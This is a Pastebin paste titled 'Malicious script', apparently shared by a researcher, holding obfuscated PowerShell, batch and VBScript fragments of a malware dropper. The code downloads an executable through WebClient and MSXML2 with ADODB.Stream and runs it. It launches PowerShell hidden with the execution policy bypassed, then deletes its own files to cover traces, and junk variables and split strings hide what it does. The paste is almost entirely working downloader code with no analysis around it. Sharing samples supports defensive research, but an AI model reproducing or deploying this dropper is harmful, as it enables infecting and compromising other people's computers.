API tools faq
paste
Advertisement
dynamoo

Malicious script

dynamoo
Jul 22nd, 2015
583
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.97 KB | None | 0 0
raw download clone embed print report
  1. <text10>$njqkwdnjkqw='jwqdnkqwhj21kjh1j21';
  2. $qbjwdjqwbdq='1j2ehkj12h jk12hekj21 ';
  3. $down = New-Object System.Net.WebClient;
  4. $jqwdnjqkwdbj='n21jek12ehj 12hejk21 hejk';
  5. $file = $pths+$nnm+'.'+'e'+'xe';
  6. $statsfile = $pths+'444.jpg';
  7. $down.headers[''+'User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  8. $dasdw='asdgjasd';
  9. $down.DownloadFile($ggtt,$file);
  10. $down.DownloadFile($stat,$statsfile);
  11. $asndjkashdas='hqugdhjgqw hj2gjh1gd hj12ghej1';
  12. $ScriptDir = $MyInvocation.ScriptName;
  13. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  14. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'jpg';
  15. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  16. $psFilePath = $pths+$wehs+'.'+'ps'+'1';
  17. $asdhjqgwdq='qhwgdjqwghdjqw';
  18. $qwbhg21jd21h='jakshdjhagsdasd';
  19. Start-Sleep -s 13;
  20. cmd.exe /c $file;
  21. $file1 = gci $vbsFilePath -Force
  22. $nqjwdhgjqwd='qvdhqgwjdgwq';
  23. $file2 = gci $btFilePath -Force
  24. $file3 = gci $psFilePath -Force
  25. $kasldds = $vbsFilePath
  26. If (Test-Path $kasldds){ Remove-Item $kasldds }
  27. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  28. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  29. $asbdhjags = 'jahdjkhdjk21 21hjkhe jkhsakhd assd';
  30. If (Test-Path $file){ Remove-Item $file }
  31. Remove-Item $MyINvocation.InvocationName</text10>
  32. <text20>ping 3.2.1.1 -n 2
  33. chcp 1251
  34. :nuwqhduiw
  35. set Rts2="vb"
  36. set Rts1="."
  37. set Rts3="s"</text20>
  38. <text21>:byqdyqwgjhg
  39. cscript.exe %Rts4%%Rts1%%Rts2%%Rts3%
  40. exit</text21>
  41. <text30>Dim dff
  42. dff = 68
  43. swdff = 68
  44. currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
  45. Set objFSO=CreateObject("Scripting.FileSystemObject")
  46. huih = ".ps"&"1"
  47. nuaaa = "powerShell.exe"</text30>
  48. <text31>Set objShell = CreateObject("Wscript.shell")
  49. objShell.Run ""&nuaaa&" -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true</text31>
  50. <stext1>@echo off
  51. :wdhqgdhjg
  52. :jqwidqwdh
  53. ping 1.2.3.1 -n 2
  54. set ggtt="bs"</stext1>
  55. <stext2>cscript.exe %trfd%%nmsj%".v"%ggtt%
  56. ping 2.2.1.1 -n 2
  57. :windows
  58. %trfd%%exds%".exe"
  59. :loop
  60. ping 1.3.1.2 -n 1
  61. set tar1=%nmsj%".bat"
  62. set stat="444.png"
  63. del %trfd%%nmsj%".v"%ggtt%
  64. del %trfd%%tar1%
  65. del %trfd%%stat%
  66. if exist %trfd%%tar1% goto loop
  67. if exist %trfd%%nmsj%".vbs" goto loop
  68. exit</stext2>
  69.  
  70. <stext3>frgea ="M"+"SX"+"ML2.ServerX"+"MLH"+"T"+"T"+Chr(80)+""
  71. Set objXMLHTTP = CreateObject(frgea)
  72. Set sFs = CreateObject(frgea)
  73. objXMLHTTP.open "G"+"ET", strRT, False
  74. sFs.open "GET", statRT, False
  75. objXMLHTTP.send()
  76. sFs.send()
  77. If objXMLHTTP.Status = 200 Then
  78. uwqhda = "AD"&"ODB."
  79. jaisd = uwqhda
  80. Set objADOStream = CreateObject(jaisd+Chr(Sgn(-4)+84)+""&"tr"&"eam"&"")
  81. objADOStream.Open
  82. objADOStream.Type = 1
  83. objADOStream.Write objXMLHTTP.ResponseBody
  84. objADOStream.Position = 0
  85. objADOStream.SaveToFile strTecation
  86. objADOStream.Close
  87. Set objADOStream = Nothing
  88. End if
  89. Set objXMLHTTP = Nothing
  90. uhqgwduqgwd = "qihwduiqwudqwi hdqwhd"
  91. Set objShell = CreateObject("WScript.Shell")</stext3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!